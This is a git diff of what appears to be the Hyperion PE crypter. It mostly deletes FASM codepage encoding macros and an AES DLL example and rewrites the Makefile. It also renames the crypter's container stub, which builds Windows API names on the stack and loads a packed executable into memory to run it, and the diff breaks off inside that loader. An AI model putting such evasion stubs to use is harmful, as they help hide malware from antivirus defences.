-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh & char < 0A0h
-      virtual at 0
-      if char < 90h
-       dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,17D,?
-      else
-       dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,17Eh,178h
-      end if
-      load char word from (char and 0Fh)*2
-      end virtual
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1253.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1253.INC
deleted file mode 100644
index a70cc62..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1253.INC
+++ /dev/null
@@ -1,35 +0,0 @@
-
-; Windows 1253
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      if char < 0C0h
-       virtual at 0
-       if char < 90h
-	dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,?,?,?
-       else if char < 0A0h
-	dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,?,?,?
-       else if char < 0B0h
-	dw 0A0h,385h,386h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,?,0ABh,0ACh,0ADh,0AEh,2015h
-       else
-	dw 0B0h,0B1h,0B2h,0B3h,384h,0B5h,0B6h,0B7h,288h,389h,38Ah,0BBh,38Ch,0BDh,38Eh,38Fh
-       end if
-       load char word from (char and 0Fh)*2
-       end virtual
-      else
-       char = 390h+char-0C0h
-      end if
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1254.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1254.INC
deleted file mode 100644
index 45cff5a..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1254.INC
+++ /dev/null
@@ -1,39 +0,0 @@
-
-; Windows 1254
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh & char < 0A0h
-      virtual at 0
-      if char < 90h
-       dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,160h,2039h,152h,?,?,?
-      else
-       dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,161h,203Ah,153h,?,?,178h
-      end if
-      load char word from (char and 0Fh)*2
-      end virtual
-      store word char at $$+offset+(%-1)*2
-     else if char = 0D0h
-      store word 11Eh at $$+offset+(%-1)*2
-     else if char = 0DDh
-      store word 130h at $$+offset+(%-1)*2
-     else if char = 0DEh
-      store word 15Eh at $$+offset+(%-1)*2
-     else if char = 0F0h
-      store word 11Fh at $$+offset+(%-1)*2
-     else if char = 0FDh
-      store word 131h at $$+offset+(%-1)*2
-     else if char = 0FEh
-      store word 15Fh at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1255.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1255.INC
deleted file mode 100644
index f6fe972..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1255.INC
+++ /dev/null
@@ -1,39 +0,0 @@
-
-; Windows 1255
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      virtual at 0
-      if char < 90h
-       dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,?,?,?,?
-      else if char < 0A0h
-       dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,?,?,?,?
-      else if char < 0B0h
-       dw 0A0h,0A1h,0A2h,0A3h,20AAh,0A5h,0A6h,0A7h,0A8h,0A9h,0D7h,0ABh,0ACh,0ADh,0AEh,0AFh
-      else if char < 0C0h
-       dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0F7h,0BBh,0BCh,0BDh,0BEh,0BFh
-      else if char < 0D0h
-       dw 5B0h,5B1h,5B2h,5B3h,5B4h,5B5h,5B6h,5B7h,5B8h,5B9h,?,5BBh,5BCh,5BDh,5BEh,5BFh
-      else if char < 0E0h
-       dw 5C0h,5C1h,5C2h,5C3h,5F0h,5F1h,5F2h,5F3h,5F4h,?,?,?,?,?,?,?
-      else if char < 0F0h
-       dw 5D0h,5D1h,5D2h,5D3h,5D4h,5D5h,5D6h,5D7h,5D8h,5D9h,5DAh,5DBh,5DCh,5DDh,5DEh,5DFh
-      else
-       dw 5E0h,5E1h,5E2h,5E3h,5E4h,5E5h,5E6h,5E7h,5E8h,5E9h,5EAh,?,?,200Eh,200Fh,?
-      end if
-      load char word from (char and 0Fh)*2
-      end virtual
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1256.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1256.INC
deleted file mode 100644
index 25248fa..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1256.INC
+++ /dev/null
@@ -1,39 +0,0 @@
-
-; Windows 1256
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      virtual at 0
-      if char < 90h
-       dw 20ACh,67Eh,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,679h,2039h,152h,686h,698h,688h
-      else if char < 0A0h
-       dw 6AFh,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,6A9h,2122h,691h,203Ah,153h,200Ch,200Dh,6BAh
-      else if char < 0B0h
-       dw 0A0h,60Ch,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,6BEh,0ABh,0ACh,0ADh,0AEh,0AFh
-      else if char < 0C0h
-       dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
-      else if char < 0D0h
-       dw 6C1h,621h,622h,623h,624h,625h,626h,627h,628h,629h,62Ah,62Bh,62Ch,62Dh,62Eh,62Fh
-      else if char < 0E0h
-       dw 630h,631h,632h,633h,634h,635h,636h,0D7h,637h,638h,639h,63Ah,640h,641h,642h,643h
-      else if char < 0F0h
-       dw 0E0h,644h,0E2h,645h,646h,647h,648h,0E7h,0E8h,0E9h,0EAh,0EBh,649h,64Ah,0EEh,0EFh
-      else
-       dw 64Bh,64Ch,64Dh,64Eh,0F4h,64Fh,650h,0F7h,651h,0F9h,652h,0FBh,0FCh,200Eh,200Fh,6D2h
-      end if
-      load char word from (char and 0Fh)*2
-      end virtual
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1257.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1257.INC
deleted file mode 100644
index f150b41..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1257.INC
+++ /dev/null
@@ -1,39 +0,0 @@
-
-; Windows 1257
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      virtual at 0
-      if char < 90h
-       dw 20ACh,?,201Ah,?,201Eh,2026h,2020h,2021h,?,2030h,?,2039h,?,0A8h,2C7h,0B8h
-      else if char < 0A0h
-       dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,2122h,?,203Ah,?,0AFh,2DBh,?
-      else if char < 0B0h
-       dw 0A0h,?,0A2h,0A3h,0A4h,?,0A6h,0A7h,0D8h,0A9h,156h,0ABh,0ACh,0ADh,0AEh,0C6h
-      else if char < 0C0h
-       dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0F8h,0B9h,157h,0BBh,0BCh,0BDh,0BEh,0E6h
-      else if char < 0D0h
-       dw 104h,12Eh,100h,106h,0C4h,0C5h,118h,112h,10Ch,0C9h,179h,116h,122h,136h,12Ah,13Bh
-      else if char < 0E0h
-       dw 160h,143h,145h,0D3h,14Ch,0D5h,0D6h,0D7h,172h,141h,15Ah,16Ah,0DCh,17Bh,17Dh,0DFh
-      else if char < 0F0h
-       dw 105h,12Fh,101h,107h,0E4h,0E5h,119h,113h,10Dh,0E9h,17Ah,117h,123h,137h,12Bh,13Ch
-      else
-       dw 161h,144h,146h,0F3h,14Dh,0F5h,0F6h,0F7h,173h,142h,15Bh,16Bh,0FCh,17Ch,17Eh,2D9h
-      end if
-      load char word from (char and 0Fh)*2
-      end virtual
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1258.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1258.INC
deleted file mode 100644
index 73790b5..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN1258.INC
+++ /dev/null
@@ -1,39 +0,0 @@
-
-; Windows 1258
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      virtual at 0
-      if char < 90h
-       dw 20ACh,?,201Ah,192h,201Eh,2026h,2020h,2021h,2C6h,2030h,?,2039h,152h,?,?,?
-      else if char < 0A0h
-       dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,2DCh,2122h,?,203Ah,153h,?,?,178h
-      else if char < 0B0h
-       dw 0A0h,0A1h,0A2h,0A3h,0A4h,0A5h,0A6h,0A7h,0A8h,0A9h,0AAh,0ABh,0ACh,0ADh,0AEh,0AFh
-      else if char < 0C0h
-       dw 0B0h,0B1h,0B2h,0B3h,0B4h,0B5h,0B6h,0B7h,0B8h,0B9h,0BAh,0BBh,0BCh,0BDh,0BEh,0BFh
-      else if char < 0D0h
-       dw 0C0h,0C1h,0C2h,102h,0C4h,0C5h,0C6h,0C7h,0C8h,0C9h,0CAh,0CBh,300h,0CDh,0CEh,0CFh
-      else if char < 0E0h
-       dw 110h,0D1h,309h,0D3h,0D4h,1A0h,0D6h,0D7h,0D8h,0D9h,0DAh,0DBh,0DCh,1AFh,303h,0DFh
-      else if char < 0F0h
-       dw 0E0h,0E1h,0E2h,103h,0E4h,0E5h,0E6h,0E7h,0E8h,0E9h,0EAh,0EBh,301h,0EDh,0EEh,0EFh
-      else
-       dw 111h,0F1h,323h,0F3h,0F4h,1A1h,0F6h,0F7h,0F8h,0F9h,0FAh,0FBh,0FCh,1B0h,20ABh,0FFh
-      end if
-      load char word from (char and 0Fh)*2
-      end virtual
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN874.INC b/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN874.INC
deleted file mode 100644
index 64a6a54..0000000
--- a/binary/hyperion/source/Fasm/fasminclude/ENCODING/WIN874.INC
+++ /dev/null
@@ -1,31 +0,0 @@
-
-; Windows 874
-
-macro du [arg]
- { local offset,char
-   offset = $-$$
-   du arg
-   if arg eqtype ''
-    repeat ($-offset-$$)/2
-     load char byte from $$+offset+(%-1)*2
-     if char > 7Fh
-      if char < 0A0h
-       virtual at 0
-       if char < 90h
-	dw 20ACh,?,?,?,?,2026h,?,?,?,?,?,?,?,?,?,?
-       else
-	dw ?,2018h,2019h,201Ch,201Dh,2022h,2013h,2014h,?,?,?,?,?,?,?,?
-       end if
-       load char word from (char and 0Fh)*2
-       end virtual
-      else if char > 0A0h
-       char = 0E00h+char-0A0h
-      end if
-      store word char at $$+offset+(%-1)*2
-     end if
-    end repeat
-   end if }
-
-struc du [args]
- { common label . word
-   du args }
diff --git a/binary/hyperion/source/Fasm/license.TXT b/binary/hyperion/source/Fasm/license.TXT
old mode 100644
new mode 100755
index a8045b8..95b7463
--- a/binary/hyperion/source/Fasm/license.TXT
+++ b/binary/hyperion/source/Fasm/license.TXT
@@ -1,6 +1,6 @@
 
-flat assembler  version 1.69
-Copyright (c) 1999-2011, Tomasz Grysztar.
+flat assembler  version 1.71
+Copyright (c) 1999-2016, Tomasz Grysztar.
 All rights reserved.
 
 This program is free for commercial and non-commercial use as long as
diff --git a/binary/hyperion/source/FasmAES-1.0/aes10.asm b/binary/hyperion/source/FasmAES-1.0/aes10.asm
deleted file mode 100644
index eb9ea74..0000000
--- a/binary/hyperion/source/FasmAES-1.0/aes10.asm
+++ /dev/null
@@ -1,58 +0,0 @@
-format PE GUI 4.0 DLL
-entry DllEntryPoint
-
-include '../Fasm/fasminclude/win32a.inc'
-include 'aes/aes.inc'
-
-section '.text' code readable executable
-
-proc DllEntryPoint hinstDLL,fdwReason,lpvReserved
-	mov	eax,TRUE
-	ret
-endp
-
-; VOID ShowErrorMessage(HWND hWnd,DWORD dwError);
-proc ShowErrorMessage hWnd,dwError
-  local lpBuffer:DWORD
-	lea	eax,[lpBuffer]
-	invoke	FormatMessage,FORMAT_MESSAGE_ALLOCATE_BUFFER+FORMAT_MESSAGE_FROM_SYSTEM,0,[dwError],LANG_NEUTRAL,eax,0,0
-	invoke	MessageBox,[hWnd],[lpBuffer],NULL,MB_ICONERROR+MB_OK
-	invoke	LocalFree,[lpBuffer]
-	ret
-endp
-
-; VOID ShowLastError(HWND hWnd);
-proc ShowLastError hWnd
-	invoke	GetLastError
-	stdcall ShowErrorMessage,[hWnd],eax
-	ret
-endp
-
-; VOID aesEncrypt(size, pointer to clear text, pointer to encryption, key)
-; VOID aesDecrypt(size, pointer to encrypted text, pointer to decryption, key)
-include 'aes/aes.asm'
-
-section '.idata' import data readable writeable
-
-  library kernel,'KERNEL32.DLL',\
-	  user,'USER32.DLL'
-
-  import kernel,\
-	 GetLastError,'GetLastError',\
-	 SetLastError,'SetLastError',\
-	 FormatMessage,'FormatMessageA',\
-	 LocalFree,'LocalFree'
-
-  import user,\
-	 MessageBox,'MessageBoxA'
-
-section '.edata' export data readable
-
-  export 'AES10.DLL',\
-	 ShowErrorMessage,'ShowErrorMessage',\
-	 ShowLastError,'ShowLastError',\
-	 encAES,'aesEncrypt',\
-	 decAES,'aesDecrypt'
-
-section '.reloc' fixups data discardable
-
diff --git a/binary/hyperion/source/FasmAES-1.0/aes10.dll b/binary/hyperion/source/FasmAES-1.0/aes10.dll
deleted file mode 100644
index f227d0e..0000000
Binary files a/binary/hyperion/source/FasmAES-1.0/aes10.dll and /dev/null differ
diff --git a/binary/hyperion/source/FasmAES-1.0/example_dll.asm b/binary/hyperion/source/FasmAES-1.0/example_dll.asm
deleted file mode 100644
index 2e5d11d..0000000
--- a/binary/hyperion/source/FasmAES-1.0/example_dll.asm
+++ /dev/null
@@ -1,39 +0,0 @@
-format PE CONSOLE 4.0
-entry start
-
-include 'win32a.inc'
-
-TEXTSIZE equ 0x30
-
-section '.text' code readable executable
-
-  start:
-
-    ;invoke aesEncrypt, TEXTSIZE, clear_msg, enc_msg, key128
-    ;invoke aesDecrypt, TEXTSIZE, enc_msg, dec_msg, key128
-    invoke aesEncrypt, TEXTSIZE, clear_msg, clear_msg, key128
-    invoke aesDecrypt, TEXTSIZE, clear_msg, clear_msg, key128
-    invoke ExitProcess, 0
-
-section '.data' data readable writeable
-
-
-  clear_msg db 'hello world, this is a secret text',\
-	       0x0d, 0x0a, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
-  enc_msg   rb TEXTSIZE
-  dec_msg   rb TEXTSIZE
-
-  key128    db 0x03, 0x02, 0x01, 0x00, 0x07, 0x06, 0x05, 0x04,\
-	       0x0b, 0x0a, 0x09, 0x08, 0x0f, 0x0e, 0x0d, 0x0c
-
-section '.idata' import data readable writeable
-
-  library kernel,'KERNEL32.DLL',\
-	  aes,'AES10.DLL'
-
-  import kernel,\
-	 ExitProcess,'ExitProcess'
-
-  import aes,\
-	 aesEncrypt,'aesEncrypt',\
-	 aesDecrypt,'aesDecrypt'
\ No newline at end of file
diff --git a/binary/hyperion/source/Makefile b/binary/hyperion/source/Makefile
index eb03e4b..43c5d50 100644
--- a/binary/hyperion/source/Makefile
+++ b/binary/hyperion/source/Makefile
@@ -1,31 +1,11 @@
-CC = g++
-SRC = Src\Crypter
-BIN = .
-OBJ = Obj
-CFLAGS = -ansi -c -Wall -pedantic -O2 -m32
-
-.PHONY:all
-all: createoutput.o fileaccess.o peanalysis.o pe.o hyperion.o ostreamlog.o
-	$(CC) -o $(BIN)\hyperion.exe $(OBJ)\hyperion.o $(OBJ)\pe.o $(OBJ)\peanalysis.o $(OBJ)\fileaccess.o $(OBJ)\createoutput.o $(OBJ)\ostreamlog.o
-		 
-createoutput.o: $(SRC)\createoutput.cpp
-	$(CC) $(CFLAGS) -o $(OBJ)\createoutput.o $(SRC)\createoutput.cpp
-	
-fileaccess.o: $(SRC)\fileaccess.cpp
-	$(CC) $(CFLAGS) -o $(OBJ)\fileaccess.o $(SRC)\fileaccess.cpp
-	
-peanalysis.o: $(SRC)\peanalysis.cpp
-	$(CC) $(CFLAGS) -o $(OBJ)\peanalysis.o $(SRC)\peanalysis.cpp
-
-pe.o: $(SRC)\pe.cpp
-	$(CC) $(CFLAGS) -o $(OBJ)\pe.o $(SRC)\pe.cpp
-
-hyperion.o: $(SRC)\hyperion.cpp
-	$(CC) $(CFLAGS) -o $(OBJ)\hyperion.o $(SRC)\hyperion.cpp
-	
-ostreamlog.o: $(SRC)\ostreamlog.cpp
-	$(CC) $(CFLAGS) -o $(OBJ)\ostreamlog.o $(SRC)\ostreamlog.cpp
-
-.PHONY:clean
-clean:
-	del $(BIN)\hyperion.exe && del $(OBJ)\*.o
+CC = gcc
+AES_INCLUDE_DIR = Src/Payloads/Aes/c
+CFLAGS = -std=c99 -Wall -pedantic -O2 -m32 -I$(AES_INCLUDE_DIR)
+SRC = $(wildcard Src/Crypter/*.c) $(wildcard Src/Payloads/Aes/c/*.c)
+OBJ = $(SRC:.c=.o)
+EXECUTABLE=hyperion.exe
+ 
+all: hyperion
+ 
+hyperion: $(OBJ)
+	$(CC) $(CFLAGS) -o $(EXECUTABLE) $^
diff --git a/binary/hyperion/source/Src/FasmContainer32/createstrings.inc b/binary/hyperion/source/Src/Container/32/createstrings.inc
similarity index 100%
rename from binary/hyperion/source/Src/FasmContainer32/createstrings.inc
rename to binary/hyperion/source/Src/Container/32/createstrings.inc
diff --git a/binary/hyperion/source/Src/FasmContainer32/hyperion.inc b/binary/hyperion/source/Src/Container/32/hyperion.inc
similarity index 100%
rename from binary/hyperion/source/Src/FasmContainer32/hyperion.inc
rename to binary/hyperion/source/Src/Container/32/hyperion.inc
diff --git a/binary/hyperion/source/Src/FasmContainer32/loadapis.asm b/binary/hyperion/source/Src/Container/32/loadapis.asm
similarity index 96%
rename from binary/hyperion/source/Src/FasmContainer32/loadapis.asm
rename to binary/hyperion/source/Src/Container/32/loadapis.asm
index 3cef3a8..0f22687 100644
--- a/binary/hyperion/source/Src/FasmContainer32/loadapis.asm
+++ b/binary/hyperion/source/Src/Container/32/loadapis.asm
@@ -1,135 +1,135 @@
-;Dynamically load the needed APIs
-;Strings are created on stack
-
-;dllname: zero terminated string with dll name
-;store: save the dll image base here
-;Jumps to LoadLogAPIsExit if an Error Occurs
-macro loadDLL dllname, store, exit
-{
-	lea eax,[dllname]
-	invoke LoadLibrary,eax
-	test eax,eax
-	jz exit
-	mov [store],eax
-}
-
-;functionname: zero terminated string with functions name
-;dll_imagebase: imagebase of the dll
-;returns: function pointer in eax
-macro loadAPI functionname, dll_imagebase, exit
-{
-	lea eax,[functionname]
-	invoke GetProcAddress,dword [dll_imagebase],eax
-	test eax,eax
-	jz exit
-}
-
-;Loads all necessary APISs
-proc loadRegularAPIs stdcall APITable:DWORD
-
-local str1[256]:BYTE, kernel32_imagebase:DWORD
-
-	pushad
-	writeWithNewLine createStringLoading, str1, LoadRegularAPIsExit_Error
-
-	;Get Kernel32.Dll Imagebase
-	writeWithNewLine createStringKernel32, str1, LoadRegularAPIsExit_Error
-	loadDLL str1, kernel32_imagebase, LoadRegularAPIsExit_Error
-
-	;Load GetModuleHandle
-	writeWithNewLine createStringGetModuleHandle, str1, LoadRegularAPIsExit_Error
-	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+GetModuleHandle],eax
-
-	;Load VirtualAlloc
-	writeWithNewLine createStringVirtualAlloc, str1, LoadRegularAPIsExit_Error
-	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+VirtualAlloc],eax
-
-	;Load VirtualProtect
-	writeWithNewLine createStringVirtualProtect, str1, LoadRegularAPIsExit_Error
-	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+VirtualProtect],eax
-
-	;Load VirtualFree
-	writeWithNewLine createStringVirtualFree, str1, LoadRegularAPIsExit_Error
-	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+VirtualFree],eax
-
-	popad
-	mov eax,1
-	ret
-	
-LoadRegularAPIsExit_Error:
-	popad
-	mov eax,0
-	ret
-endp
-
-;Loads the basic functions for log file access
-proc loadLogAPIs stdcall APITable:DWORD
-
-local str1[256]:BYTE, kernel32_imagebase:DWORD
-
-	pushad
-	;Get Kernel32.Dll Imagebase
-	createStringKernel32 str1
-	loadDLL str1, kernel32_imagebase, LoadLogAPIsExit_Error
-
-	;Load CreateFileMapping API
-	createStringCreateFileMapping str1
-	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+CreateFileMapping],eax
-
-	;Load MapViewOfFile API
-	createStringMapViewOfFile str1
-	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+MapViewOfFile],eax
-
-	;Load UnmapViewOfFile API
-	createStringUnmapViewOfFile str1
-	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+UnmapViewOfFile],eax
-
-	;Load UnmapViewOfFile API
-	createStringCreateFile str1
-	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+CreateFile],eax
-
-	;Load CloseHandle API
-	createStringCloseHandle str1
-	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+CloseHandle],eax
-
-	;Load GetFileSize API
-	createStringGetFileSize str1
-	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+GetFileSize],eax
-
-	;Load DeleteFile API
-	createStringDeleteFile str1
-	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
-	mov edx,[APITable]
-	mov [edx+DeleteFile],eax
-
-	;apis loaded successfully
-	popad
-	mov eax,1
-	ret
-
-LoadLogAPIsExit_Error:
-	popad
-	mov eax,0
-	ret
-
-endp
+;Dynamically load the needed APIs
+;Strings are created on stack
+
+;dllname: zero terminated string with dll name
+;store: save the dll image base here
+;Jumps to LoadLogAPIsExit if an Error Occurs
+macro loadDLL dllname, store, exit
+{
+	lea eax,[dllname]
+	invoke LoadLibrary,eax
+	test eax,eax
+	jz exit
+	mov [store],eax
+}
+
+;functionname: zero terminated string with functions name
+;dll_imagebase: imagebase of the dll
+;returns: function pointer in eax
+macro loadAPI functionname, dll_imagebase, exit
+{
+	lea eax,[functionname]
+	invoke GetProcAddress,dword [dll_imagebase],eax
+	test eax,eax
+	jz exit
+}
+
+;Loads all necessary APISs
+proc loadRegularAPIs stdcall APITable:DWORD
+
+local str1[256]:BYTE, kernel32_imagebase:DWORD
+
+	pushad
+	writeWithNewLine createStringLoading, str1, LoadRegularAPIsExit_Error
+
+	;Get Kernel32.Dll Imagebase
+	writeWithNewLine createStringKernel32, str1, LoadRegularAPIsExit_Error
+	loadDLL str1, kernel32_imagebase, LoadRegularAPIsExit_Error
+
+	;Load GetModuleHandle
+	writeWithNewLine createStringGetModuleHandle, str1, LoadRegularAPIsExit_Error
+	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+GetModuleHandle],eax
+
+	;Load VirtualAlloc
+	writeWithNewLine createStringVirtualAlloc, str1, LoadRegularAPIsExit_Error
+	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+VirtualAlloc],eax
+
+	;Load VirtualProtect
+	writeWithNewLine createStringVirtualProtect, str1, LoadRegularAPIsExit_Error
+	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+VirtualProtect],eax
+
+	;Load VirtualFree
+	writeWithNewLine createStringVirtualFree, str1, LoadRegularAPIsExit_Error
+	loadAPI str1, kernel32_imagebase, LoadRegularAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+VirtualFree],eax
+
+	popad
+	mov eax,1
+	ret
+	
+LoadRegularAPIsExit_Error:
+	popad
+	mov eax,0
+	ret
+endp
+
+;Loads the basic functions for log file access
+proc loadLogAPIs stdcall APITable:DWORD
+
+local str1[256]:BYTE, kernel32_imagebase:DWORD
+
+	pushad
+	;Get Kernel32.Dll Imagebase
+	createStringKernel32 str1
+	loadDLL str1, kernel32_imagebase, LoadLogAPIsExit_Error
+
+	;Load CreateFileMapping API
+	createStringCreateFileMapping str1
+	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+CreateFileMapping],eax
+
+	;Load MapViewOfFile API
+	createStringMapViewOfFile str1
+	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+MapViewOfFile],eax
+
+	;Load UnmapViewOfFile API
+	createStringUnmapViewOfFile str1
+	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+UnmapViewOfFile],eax
+
+	;Load UnmapViewOfFile API
+	createStringCreateFile str1
+	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+CreateFile],eax
+
+	;Load CloseHandle API
+	createStringCloseHandle str1
+	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+CloseHandle],eax
+
+	;Load GetFileSize API
+	createStringGetFileSize str1
+	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+GetFileSize],eax
+
+	;Load DeleteFile API
+	createStringDeleteFile str1
+	loadAPI str1, kernel32_imagebase, LoadLogAPIsExit_Error
+	mov edx,[APITable]
+	mov [edx+DeleteFile],eax
+
+	;apis loaded successfully
+	popad
+	mov eax,1
+	ret
+
+LoadLogAPIsExit_Error:
+	popad
+	mov eax,0
+	ret
+
+endp
diff --git a/binary/hyperion/source/Src/FasmContainer32/loadexecutable.asm b/binary/hyperion/source/Src/Container/32/loadexecutable.asm
similarity index 95%
rename from binary/hyperion/source/Src/FasmContainer32/loadexecutable.asm
rename to binary/hyperion/source/Src/Container/32/loadexecutable.asm
index 2d56519..9014946 100644
--- a/binary/hyperion/source/Src/FasmContainer32/loadexecutable.asm
+++ b/binary/hyperion/source/Src/Container/32/loadexecutable.asm
@@ -1,584 +1,584 @@
-;Loads the exe which is stored in input_image
-;into memory and starts its execution
-proc loadExecutable stdcall APITable:DWORD,\
-input_image:DWORD
-
-local str1[256]:BYTE, ret_val:DWORD, image_file_header:DWORD,\
-loaded_file:DWORD
-
-	pushad
-	;verify checksum of packed executable
-	writeWithNewLine createStringVerifyChecksum, str1, le_exit_error
-	stdcall verifyChecksum, [input_image], INFILE_SIZE
-	test eax,eax
-	jz le_exit_error
-
-	;verify whether the content of the data section is pe
-	writeWithNewLine createStringVerifyPE, str1, le_exit_error
-	mov eax,[input_image]
-	add eax,4
-	stdcall verifyPE, eax, INFILE_SIZE
-	test eax,eax
-	mov [image_file_header],eax
-	jz le_exit_error
-
-	;copy pe header and sections into memory
-	writeNewLineToLog APITable
-	writeWithNewLine createStringMappingFileInMemory, str1, le_exit_error
-	mov eax,[input_image]
-	add eax,4
-	mov ebx,INFILE_SIZE
-	sub ebx,4
-	stdcall loadFile, [APITable], [image_file_header], eax, ebx
-	test eax,eax
-	mov [loaded_file],eax
-	jz le_exit_error
-
-	;loading import table
-	writeNewLineToLog APITable
